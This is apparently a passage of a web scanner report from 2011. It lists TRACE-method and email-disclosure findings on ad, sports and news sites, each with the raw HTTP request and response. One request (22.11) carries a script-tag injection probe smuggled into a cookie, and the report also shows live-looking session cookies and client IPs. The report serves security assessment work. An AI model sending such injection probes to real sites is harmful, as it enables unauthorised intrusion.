Cookie: 1c42f8d3a07893f9; OAID=6f699005174db05207a17138d8473dc0; OXRB=28_4196; __utma=20948333.858847159.1317599444.1317599444.1317599444.1; __utmb=20948333.6.6.1317599444; __utmc=20948333; __utmz=20948333.1317599444.1.1.utmc
...[SNIP]...

21.5. http://event.publishflow.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://event.publishflow.com
Path:   /

Request

TRACE / HTTP/1.0
Host: event.publishflow.com
Cookie: ba7bc8b4ce090b8b

Response

HTTP/1.1 200 OK
Content-Type: message/http
Date: Sun, 02 Oct 2011 23:51:35 GMT
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.5 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8g
Content-Length: 323
Connection: Close

TRACE / HTTP/1.1
host: event.publishflow.com
Cookie: ba7bc8b4ce090b8b; AWSELB=974B0DDE6F27F729ADA14C0EB858EF620F7B00166FC4DA806180BED4EB66F98EC8584227F6B500BE28E2327CEF7D510565EB6A8C2B8313CC4B55BD60C1425C39616D3EB3
X-Forwarded-For: 50.23.123.106
X-Forwarded-Port: 80

...[SNIP]...

21.6. http://m.xp1.ru4.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.xp1.ru4.com
Path:   /

Request

TRACE / HTTP/1.0
Host: m.xp1.ru4.com
Cookie: a57da61faf1d523d

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:50:18 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: message/http
Connection: close

TRACE / HTTP/1.0
Host: m.xp1.ru4.com
Cookie: a57da61faf1d523d; X1ID=OO-00000000000000000; 31041217-B31041253=2|31041263|0|0|0|31041234|31041231|-1; 66281-B66290=3|0|0|0|0|66286|110253|-1
Connection: Keep-Alive
X-xp1-forwarded-for: 50.23.123.106


21.7. http://matcher-cwb.bidder7.mookie1.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://matcher-cwb.bidder7.mookie1.com
Path:   /

Request

TRACE / HTTP/1.0
Host: matcher-cwb.bidder7.mookie1.com
Cookie: b74d61cdd8b81312

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:50:15 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: matcher-cwb.bidder7.mookie1.com
Cookie: b74d61cdd8b81312; optouts=cookies; RMOPTOUT=3; id=; mdata=
Connection: Keep-Alive
MIG_IP: 50.23.123.106


21.8. http://optimized-by.rubiconproject.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /

Request

TRACE / HTTP/1.0
Host: optimized-by.rubiconproject.com
Cookie: b35c937d4055a2c5

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:48:53 GMT
Server: RAS/1.3 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: b35c937d4055a2c5; put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSA
...[SNIP]...

21.9. http://r.openx.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /

Request

TRACE / HTTP/1.0
Host: r.openx.net
Cookie: 500463f5191b7ca

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:52:32 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: r.openx.net
Cookie: 500463f5191b7ca; i=d2a43928-76cd-49ea-b899-b41fb371435f; s=ba6bf0b1-8895-45a9-97a1-53f788c412d7; p=1317599547
X-Forwarded-For: 50.23.123.106


21.10. http://tap.rubiconproject.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /

Request

TRACE / HTTP/1.0
Host: tap.rubiconproject.com
Cookie: da389861817d4db4

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:41 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: tap.rubiconproject.com
Cookie: da389861817d4db4; SERVERID=; dq=7|7|0|0; put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7
...[SNIP]...

21.11. http://www.guardian.co.uk/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /

Request

TRACE / HTTP/1.0
Host: www.guardian.co.uk
Cookie: c489d5d97860d710

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:50:54 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.guardian.co.uk
Cookie: c489d5d97860d710; GU_LOCATION=dXNhOjU6dnQ6NTpzdG93ZTo1OjUyMzpicm9hZGJhbmQ6IDQ0LjUwMDotNzIuNjQ2QDg2MjQxMTYzMTY1MzMyMzU2NTEwMjIxMTk2MjQ0MjAyMTgxNzExNjk3; s_pers=%20s_lv%3D1317599402360%7C1412207402360%3B%20s_lv_s%3DFirs
...[SNIP]...

21.12. http://www.luminate.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.luminate.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.luminate.com
Cookie: 5fe1f88139b02ae6

Response

HTTP/1.0 200 OK
Date: Sun, 02 Oct 2011 23:52:36 GMT
Server: Apache
Content-Type: message/http
X-Cache: MISS from lb3-sv.int.pixazza.com
X-Cache-Lookup: NONE from lb3-sv.int.pixazza.com:80
Via: 1.0 lb3-sv.int.pixazza.com:80 (squid/2.6.STABLE18)
Connection: Keep-Alive

TRACE / HTTP/1.0
Host: www.luminate.com
Cookie: 5fe1f88139b02ae6; shoptube_id=f6d10bcb0c; referrer_53d1ac1014=
Via: 1.0 lb3-sv.int.pixazza.com:80 (squid/2.6.STABLE18)
X-Forwarded-For: 50.23.123.106, 10.111.2.6
Cache-Control: max-age=259200


22. Email addresses disclosed
There are 47 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


22.1. http://a.cdn.intentmedia.net/javascripts/intent_media_cheaptickets_ads_fif.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.cdn.intentmedia.net
Path:   /javascripts/intent_media_cheaptickets_ads_fif.js

Issue detail

The following email address was disclosed in the response:

Request

GET /javascripts/intent_media_cheaptickets_ads_fif.js HTTP/1.1
Host: a.cdn.intentmedia.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cheaptickets.com/shop/hotelsearch?type=hotel&hotel.keyword.key=bos&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/09/11&hotel.chkout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: We87IHuP5p5Fysz4CJRxyEs81doSpQRLw9Mso7D5hV9OSbyDZC2ESxKBmNea6Yos
x-amz-request-id: F160E7DD36AA2002
Date: Thu, 29 Sep 2011 17:35:40 GMT
Last-Modified: Thu, 29 Sep 2011 17:25:40 GMT
ETag: "f257077518d69e52afb4126f290fe2e0"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 60764
Server: AmazonS3
Age: 36132
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 1370393a90a510307b04ae2532851c3a46fc8c5b2a13c11112b9d186eaeae469dbc8d3abb476aff4
Via: 1.0 e07e2d5f2d026d31ffb267fe09e7913e.cloudfront.net:11180 (CloudFront), 1.0 1164012339a4caa525f23a2181c60d76.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

var IntentMedia=(function(a){a.IMPRESSION_SERVLET="impressions";a.CONVERSION_SERVLET="conversions";a.BEACON_SERVLET="beacons";a.CHECKIN_SERVLET="checkins";a.PRODUCT_CATEGORY_VALUES={FLIGHTS:"flights",
...[SNIP]...
<a href="mailto:sponsoredsearch@cheaptickets.com">sponsoredsearch@cheaptickets.com</a>
...[SNIP]...

22.2. http://ads2.adbrite.com/v0/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The following email address was disclosed in the response:

Request

GET /v0/ad?sid=1861717&zx=0&zy=0&ww=0&wh=0&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ads.pubmatic.com/HostedDefaultTags/26620/26621/21556/559/adtag.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; untarget=1; geo="1%3AJY5LDoIwEEDv0q2ftPQ77IwXMEEPgOUTEwEDVQOEuzszbl5eX9tpV%2FFRIl%2FF8niJXIBVUu2ImumY4YBUXJQl19w1dw3khm%2BZQLSSuuPiDNFLZkbd8xzgM8C74MRepAWfvxRX1Gro0KehSc9yrsdjxDXWrsQapEfvv2mm76LG4Y1yK6jW6d%2FGtkc5n1CnR4sqwcfgG7hLaKLX1sVQZSBdU1daW6PFtv0A"; b="%3A%3A13beg%2C15sx4"

Response

HTTP/1.1 200 OK
Set-Cookie: b="%3A%3A13wid%2C13beg%2C15sx4"; path=/; domain=.adbrite.com; expires=Tue, 02-Oct-2012 01:53:09 GMT
Set-Cookie: vsd=0@1@4e891585@ads.pubmatic.com; path=/; domain=.adbrite.com; expires=Wed, 05-Oct-2011 01:53:09 GMT
Content-Type: application/x-javascript
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 03 Oct 2011 01:53:09 GMT
Content-Length: 298

document.writeln("<script type=\"text/javascript\">\nvar pubId=26620;\nvar siteId=26621;\nvar kadId=21556;\nvar kadwidth=300;\nvar kadheight=250;\nvar kadNetwork=6;\nvar kadtype=1;\n<\/script>\n<scrip
...[SNIP]...

22.3. http://ak-static.travel-ticker.com/static/images/1x1.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ak-static.travel-ticker.com
Path:   /static/images/1x1.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /static/images/1x1.jpg?ver=207657 HTTP/1.1
Host: ak-static.travel-ticker.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travel-ticker.com/Destination/?tts=01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1212
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 00:39:00 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
<link rev="made" href="mailto:unixadmin@hotwire.com" />
...[SNIP]...
<a href="mailto:unixadmin@hotwire.com">
...[SNIP]...

22.4. http://aon.com/js/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://aon.com
Path:   /js/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/s_code.js HTTP/1.1
Host: aon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://aon.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20gpv_pageName%3D/site/search.jsp%7C1317605245122%3B; JSESSIONID=C81DF03B10ABEDA473F7CB693F3AAC01

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26688-1241617105000"
Last-Modified: Wed, 06 May 2009 13:38:25 GMT
Content-Type: text/javascript
Content-Length: 26688
Date: Mon, 03 Oct 2011 01:11:38 GMT

/* SiteCatalyst code version: H.17.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
hav()+q+(qs?qs:s."
+"rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+"lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L
...[SNIP]...

22.5. http://httpd.apache.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://httpd.apache.org
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://httpd.apache.org/download.cgi
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: httpd.apache.org
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:31:15 GMT
Server: Apache/2.3.15-dev (Unix) mod_ssl/2.3.15-dev OpenSSL/1.0.0c
Last-Modified: Wed, 14 Sep 2011 06:24:38 GMT
ETag: "286ed7-25a8-4ace0d086f580-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 9640
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/
...[SNIP]...
<meta name="email" content="docs@httpd.apache.org" />
...[SNIP]...

22.6. http://httpd.apache.org/download.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://httpd.apache.org
Path:   /download.cgi

Issue detail

The following email address was disclosed in the response:

Request

GET /download.cgi HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: httpd.apache.org

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:31:11 GMT
Server: Apache/2.3.15-dev (Unix) mod_ssl/2.3.15-dev OpenSSL/1.0.0c
Vary: Accept-Encoding
Content-Length: 28373
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=u
...[SNIP]...
<meta name="email" content="docs@httpd.apache.org" />
...[SNIP]...

22.7. http://i.travelpn.com.edgesuite.net/jquery/plug-ins/jquery.cookie.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.travelpn.com.edgesuite.net
Path:   /jquery/plug-ins/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

Request

GET /jquery/plug-ins/jquery.cookie.js?_=1317600495077 HTTP/1.1
Host: i.travelpn.com.edgesuite.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 11 May 2010 14:58:21 GMT
ETag: "1096"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 4246
Content-Type: application/x-javascript
Date: Mon, 03 Oct 2011 00:08:18 GMT
Connection: close

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

22.8. http://i1.goal.com/web/goal/2011092112-rev15541/js/default/news/article-merged.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i1.goal.com
Path:   /web/goal/2011092112-rev15541/js/default/news/article-merged.js

Issue detail

The following email address was disclosed in the response:

Request

GET /web/goal/2011092112-rev15541/js/default/news/article-merged.js HTTP/1.1
Host: i1.goal.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1479357280-1317599429942; __utma=167609825.336600251.1317599442.1317599442.1317599442.1; __utmb=167609825.1.10.1317599442; __utmc=167609825; __utmz=167609825.1317599442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _em_hl=1; _em_vt=6b3bfb104abb2666e789b9e202024e62e18088e413-981323754e88f8d5; _em_v=cf9911b66e4d49b949eaf13bd6fa4e88f8d57af834-210214684e88f8d5; l=en

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=31104000
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:58:46 GMT
Expires: Wed, 26 Sep 2012 23:58:46 GMT
Last-Modified: Fri, 30 Sep 2011 15:59:55 GMT
Server: ECS (sjo/5238)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 81486

var Goal=Goal||function(){var j={supportWebSocket:(window.WebSocket)?true:false,edition:self.location.pathname.replace(new RegExp("^/([^/]+).*$"),"$1"),secure_host:(self.location.host.indexOf("local")
...[SNIP]...
(2008/10/16)
* @requires jQuery v1.2.6 or later
*
* Examples and documentation at: http://code.google.com/p/lnet/wiki/jQueryStyledSelectOverview
*
* Copyright (c) 2008 Lasar Liepins, liepins.org, liepins@gmail.com
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restrict
...[SNIP]...

22.9. http://i1.goal.com/web/goal/2011092112-rev15541/js/default/section/team-merged.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i1.goal.com
Path:   /web/goal/2011092112-rev15541/js/default/section/team-merged.js

Issue detail

The following email address was disclosed in the response:

Request

GET /web/goal/2011092112-rev15541/js/default/section/team-merged.js HTTP/1.1
Host: i1.goal.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/teams/england/97/man-utd-news
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=31104000
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:50:22 GMT
Expires: Wed, 26 Sep 2012 23:50:22 GMT
Last-Modified: Fri, 30 Sep 2011 15:59:55 GMT
Server: ECS (sjo/522A)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 82332

eval(function(h,b,i,d,g,f){g=function(a){return(a<b?"":g(parseInt(a/b)))+((a=a%b)>35?String.fromCharCode(a+29):a.toString(36));};if(!"".replace(/^/,String)){while(i--){f[g(i)]=d[i]||g(i);}d=[function(
...[SNIP]...
(2008/10/16)
* @requires jQuery v1.2.6 or later
*
* Examples and documentation at: http://code.google.com/p/lnet/wiki/jQueryStyledSelectOverview
*
* Copyright (c) 2008 Lasar Liepins, liepins.org, liepins@gmail.com
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restrict
...[SNIP]...

22.10. http://media.away.com/trip/tripjs/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.away.com
Path:   /trip/tripjs/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /trip/tripjs/s_code.js HTTP/1.1
Host: media.away.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.18 (Unix) DAV/2
Last-Modified: Fri, 23 Sep 2011 00:04:36 GMT
ETag: "34500c5-6095-4ad908dfe6d00"
Accept-Ranges: bytes
Content-Length: 24725
Content-Type: application/javascript
Cache-Control: max-age=86400
Date: Mon, 03 Oct 2011 00:35:01 GMT
Connection: close

/* SiteCatalyst code version: H.20.2.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
=s.mr($8,(vt#Wt`Zvt)`ks.hav()+q+(qs?qs:s.rq(^5)),0,i"
+"d,ta);qs`l;`Rm('t')`5s.p_r)s.p_r(`I`a`l}^I(qs);^Q`u($0;`m$0`b^1,`G$L1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`j''`5s.pg)`H^x@M=`H^xeo=`H^x`Q`r=`H^x`Q^2`l`5!id@Us.tc^ztc=1;s.flush`T()}`3#6`Ctl`0o,t,n,vo`1;s.@M="
+"$Co`I`Q^2=t;s.`Q`r=n;s.t($0}`5pg){`H^xco`0o){`P^t\"_\",1,$a`3$Co)`Cwd^xgs`0u@t`P^tun,1,$a`3s.t()`Cwd^xdc`0u@t`P^tun,$a`3s.t()}}@8=(`H`M`h`9`4$Bs@H0`Id=
...[SNIP]...

22.11. https://secure.mlb.com/shared/scripts/bam/bam.session.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.mlb.com
Path:   /shared/scripts/bam/bam.session.js

Issue detail

The following email address was disclosed in the response:

Request

GET /shared/scripts/bam/bam.session.js HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Accept-Language: en-us
Referer: https://secure.mlb.com/resetPassword.do
Accept: */*
Host: secure.mlb.com
Cookie: s_cc=true; SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; stUtil_cookie=1%7C%7C9620647761317598889493; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.0 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 31 Mar 2011 01:42:45 GMT
Content-Length: 4574
Accept-Ranges: bytes
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:48:01 GMT
Cache-Control: max-age=600
Edge-control: max-age=600
ETag: "11de-4d93dc15"
Age: 1
X-Cache: HIT from cache.mlb.com
Via: 1.1 cache.mlb.com:8889 (squid/2.7.STABLE6)
Connection: keep-alive

/**
* @fileOverview
* Session Helper Class for BAM Registration Services
*
* @author Jon Ferrer <jon.ferrer@mlb.com>
*
* @requires jquery.js
* @requires jquery.bindable.js
* @requires bam.js

...[SNIP]...

22.12. http://sorry.manutd.com/errorRedirector.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sorry.manutd.com
Path:   /errorRedirector.html

Issue detail

The following email address was disclosed in the response:

Request

GET /errorRedirector.html HTTP/1.1
Host: sorry.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.manutd.com/en.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "2354e432632545de44a52ac976d73826:1314871709"
Last-Modified: Thu, 01 Sep 2011 10:08:29 GMT
Accept-Ranges: bytes
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:49:36 GMT
Content-Length: 13704
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-eq
...[SNIP]...
<a href="mailto:enquiries@manutd.co.uk">
...[SNIP]...

22.13. http://static.guim.co.uk/static/32b9600ebe43926107624a816c7870f8566f154f/common/external-scripts/jquery-libraries/jquery.cookie.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.guim.co.uk
Path:   /static/32b9600ebe43926107624a816c7870f8566f154f/common/external-scripts/jquery-libraries/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

Request

GET /static/32b9600ebe43926107624a816c7870f8566f154f/common/external-scripts/jquery-libraries/jquery.cookie.js HTTP/1.1
Host: static.guim.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.guardian.co.uk/football/manchester-united
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 22 Sep 2011 14:01:03 GMT
Accept-Ranges: bytes
X-GU-httpd: 09
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Content-Length: 4247
Content-Type: application/x-javascript
Cache-Control: max-age=1520750
Expires: Thu, 20 Oct 2011 14:15:52 GMT
Date: Sun, 02 Oct 2011 23:50:02 GMT
Connection: close
Vary: Accept-Encoding

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
